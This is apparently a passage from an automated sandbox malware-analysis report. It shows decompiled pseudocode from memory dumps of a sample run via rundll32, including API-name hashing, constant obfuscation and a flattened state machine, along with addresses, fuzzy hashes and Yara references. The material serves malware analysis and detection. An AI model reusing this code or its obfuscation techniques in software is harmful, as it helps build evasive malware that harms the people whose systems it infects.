						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}















                                                                                                                                  0x002d2056
                                                                                                                                  0x002d205a
                                                                                                                                  0x002d205e
                                                                                                                                  0x002d2061
                                                                                                                                  0x002d2066
                                                                                                                                  0x002d2070
                                                                                                                                  0x002d207b
                                                                                                                                  0x002d2081
                                                                                                                                  0x002d2085
                                                                                                                                  0x002d208d
                                                                                                                                  0x002d2095
                                                                                                                                  0x002d209d
                                                                                                                                  0x002d20a5
                                                                                                                                  0x002d20b3
                                                                                                                                  0x002d20b6
                                                                                                                                  0x002d20ba
                                                                                                                                  0x002d20bf
                                                                                                                                  0x002d20c7
                                                                                                                                  0x002d20cf
                                                                                                                                  0x002d20d7
                                                                                                                                  0x002d20dc
                                                                                                                                  0x002d20e4
                                                                                                                                  0x002d20e9
                                                                                                                                  0x002d20f4
                                                                                                                                  0x002d20fc
                                                                                                                                  0x002d20fc
                                                                                                                                  0x002d2102
                                                                                                                                  0x002d2110
                                                                                                                                  0x002d2114
                                                                                                                                  0x002d2119
                                                                                                                                  0x002d2121
                                                                                                                                  0x002d2131
                                                                                                                                  0x002d2139
                                                                                                                                  0x002d213e
                                                                                                                                  0x002d2146
                                                                                                                                  0x002d214b
                                                                                                                                  0x002d2153
                                                                                                                                  0x002d215d
                                                                                                                                  0x002d2160
                                                                                                                                  0x002d2165
                                                                                                                                  0x002d216c
                                                                                                                                  0x002d216c
                                                                                                                                  0x002d216f
                                                                                                                                  0x002d2173
                                                                                                                                  0x002d2176
                                                                                                                                  0x002d217a
                                                                                                                                  0x002d217e
                                                                                                                                  0x002d2184
                                                                                                                                  0x002d2185
                                                                                                                                  0x002d218f
                                                                                                                                  0x002d2199

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: QC
                                                                                                                                  • API String ID: 0-229404352
                                                                                                                                  • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                  • Instruction ID: 960fb44c01f65bc1b8e4a8e53ab8e281feb7c7cae8e4476d36991f7a23eb025e
                                                                                                                                  • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                  • Instruction Fuzzy Hash: BD3115719183818BD315DF29C48905BBBE0FFD87A8F548E1DF4C9A2225D3B4CA98CB56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E176B Relevance: 1.3, Strings: 1, Instructions: 75COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002E176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E002E0AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E002D80E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}


















                                                                                                                                  0x002e1771
                                                                                                                                  0x002e1777
                                                                                                                                  0x002e177e
                                                                                                                                  0x002e1785
                                                                                                                                  0x002e1793
                                                                                                                                  0x002e1795
                                                                                                                                  0x002e179a
                                                                                                                                  0x002e179f
                                                                                                                                  0x002e17a6
                                                                                                                                  0x002e17ad
                                                                                                                                  0x002e17b1
                                                                                                                                  0x002e17b8
                                                                                                                                  0x002e17bf
                                                                                                                                  0x002e17c6
                                                                                                                                  0x002e17cd
                                                                                                                                  0x002e17d4
                                                                                                                                  0x002e17db
                                                                                                                                  0x002e17e2
                                                                                                                                  0x002e17e9
                                                                                                                                  0x002e17f0
                                                                                                                                  0x002e17f7
                                                                                                                                  0x002e1801
                                                                                                                                  0x002e1806
                                                                                                                                  0x002e180b
                                                                                                                                  0x002e180f
                                                                                                                                  0x002e1816
                                                                                                                                  0x002e181d
                                                                                                                                  0x002e1824
                                                                                                                                  0x002e1828
                                                                                                                                  0x002e182c
                                                                                                                                  0x002e1833
                                                                                                                                  0x002e183e
                                                                                                                                  0x002e183f
                                                                                                                                  0x002e1847
                                                                                                                                  0x002e184a
                                                                                                                                  0x002e184e
                                                                                                                                  0x002e1861
                                                                                                                                  0x002e1866
                                                                                                                                  0x002e186c
                                                                                                                                  0x002e1871
                                                                                                                                  0x002e1872
                                                                                                                                  0x002e1873
                                                                                                                                  0x002e1875
                                                                                                                                  0x002e187f
                                                                                                                                  0x002e1888

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #S5
                                                                                                                                  • API String ID: 0-40889119
                                                                                                                                  • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                  • Instruction ID: 8dd6c4e77a3a2a6bbad2c8738cff1f1b37ee345d7b88b15e68dabe9d67266998
                                                                                                                                  • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                  • Instruction Fuzzy Hash: 103132B2D0020AEBCB48DFE6C94AAEEBBB1FB44704F20809AD515B6250D7B50B55CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002F09B5 Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002F09B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E002D94EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}


















                                                                                                                                  0x002f09bb
                                                                                                                                  0x002f09bf
                                                                                                                                  0x002f09c6
                                                                                                                                  0x002f09cd
                                                                                                                                  0x002f09d4
                                                                                                                                  0x002f09db
                                                                                                                                  0x002f09e2
                                                                                                                                  0x002f09e9
                                                                                                                                  0x002f09f0
                                                                                                                                  0x002f09f7
                                                                                                                                  0x002f09fe
                                                                                                                                  0x002f0a09
                                                                                                                                  0x002f0a12
                                                                                                                                  0x002f0a17
                                                                                                                                  0x002f0a1e
                                                                                                                                  0x002f0a25
                                                                                                                                  0x002f0a2f
                                                                                                                                  0x002f0a32
                                                                                                                                  0x002f0a35
                                                                                                                                  0x002f0a3c
                                                                                                                                  0x002f0a43
                                                                                                                                  0x002f0a4a
                                                                                                                                  0x002f0a55
                                                                                                                                  0x002f0a5b
                                                                                                                                  0x002f0a62
                                                                                                                                  0x002f0a69
                                                                                                                                  0x002f0a70
                                                                                                                                  0x002f0a77
                                                                                                                                  0x002f0a7b
                                                                                                                                  0x002f0a82
                                                                                                                                  0x002f0a89
                                                                                                                                  0x002f0a90
                                                                                                                                  0x002f0ab3
                                                                                                                                  0x002f0abd
                                                                                                                                  0x002f0ac7

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6Rr
                                                                                                                                  • API String ID: 0-3911282678
                                                                                                                                  • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                  • Instruction ID: 7dc187272a67253de47be081a2d41e3145ad326e68c039459c76a7b4d2524129
                                                                                                                                  • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                  • Instruction Fuzzy Hash: 8C3101B1D1021EEBCB04CFA5C94A9EEFBB5FB44318F108599D121B6250D3B85B49CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E8519 Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002E8519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E002E20B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E002DA30C(_v12, _a4, E002D1DB9(__ecx), _v20);
			}









                                                                                                                                  0x002e851f
                                                                                                                                  0x002e8523
                                                                                                                                  0x002e8524
                                                                                                                                  0x002e8529
                                                                                                                                  0x002e8530
                                                                                                                                  0x002e8537
                                                                                                                                  0x002e853e
                                                                                                                                  0x002e8545
                                                                                                                                  0x002e854c
                                                                                                                                  0x002e8553
                                                                                                                                  0x002e855a
                                                                                                                                  0x002e8561
                                                                                                                                  0x002e856c
                                                                                                                                  0x002e856f
                                                                                                                                  0x002e8576
                                                                                                                                  0x002e857d
                                                                                                                                  0x002e8584
                                                                                                                                  0x002e858b
                                                                                                                                  0x002e8592
                                                                                                                                  0x002e8599
                                                                                                                                  0x002e859c
                                                                                                                                  0x002e85a3
                                                                                                                                  0x002e85aa
                                                                                                                                  0x002e85b1
                                                                                                                                  0x002e85b8
                                                                                                                                  0x002e85bf
                                                                                                                                  0x002e85c6
                                                                                                                                  0x002e85cd
                                                                                                                                  0x002e85d4
                                                                                                                                  0x002e85db
                                                                                                                                  0x002e8605

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8
                                                                                                                                  • API String ID: 0-719543824
                                                                                                                                  • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                  • Instruction ID: c6a27eb9389ef0e782f5009104ef47d7244f080e23afc6cd2c5f2a08fb2c080b
                                                                                                                                  • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                  • Instruction Fuzzy Hash: E021A2B5C00209EBCF48DFE5CA8689EBFB5FF40314F6081899411B6261D3B54B549F95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                  • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                  • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                  • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                  • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                  • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                  • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                  • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                  • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D4346 Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002D4346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E002DAE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E002DAE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E002D7FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}
































                                                                                                                                  0x002d434d
                                                                                                                                  0x002d4351
                                                                                                                                  0x002d4353
                                                                                                                                  0x002d4357
                                                                                                                                  0x002d4358
                                                                                                                                  0x002d4359
                                                                                                                                  0x002d435e
                                                                                                                                  0x002d4366
                                                                                                                                  0x002d436b
                                                                                                                                  0x002d436d
                                                                                                                                  0x002d4371
                                                                                                                                  0x002d4376
                                                                                                                                  0x002d4384
                                                                                                                                  0x002d4389
                                                                                                                                  0x002d438f
                                                                                                                                  0x002d4397
                                                                                                                                  0x002d439f
                                                                                                                                  0x002d43a4
                                                                                                                                  0x002d43ac
                                                                                                                                  0x002d43b8
                                                                                                                                  0x002d43bd
                                                                                                                                  0x002d43c3
                                                                                                                                  0x002d43c8
                                                                                                                                  0x002d43d0
                                                                                                                                  0x002d43d8
                                                                                                                                  0x002d43e5
                                                                                                                                  0x002d43e8
                                                                                                                                  0x002d43ec
                                                                                                                                  0x002d43f4
                                                                                                                                  0x002d43fc
                                                                                                                                  0x002d440c
                                                                                                                                  0x002d4410
                                                                                                                                  0x002d4418
                                                                                                                                  0x002d4420
                                                                                                                                  0x002d4428
                                                                                                                                  0x002d4430
                                                                                                                                  0x002d443c
                                                                                                                                  0x002d4441
                                                                                                                                  0x002d4447
                                                                                                                                  0x002d444f
                                                                                                                                  0x002d4457
                                                                                                                                  0x002d445f
                                                                                                                                  0x002d4467
                                                                                                                                  0x002d446f
                                                                                                                                  0x002d4477
                                                                                                                                  0x002d447f
                                                                                                                                  0x002d4487
                                                                                                                                  0x002d448f
                                                                                                                                  0x002d4497
                                                                                                                                  0x002d449f
                                                                                                                                  0x002d44a7
                                                                                                                                  0x002d44ac
                                                                                                                                  0x002d44b4
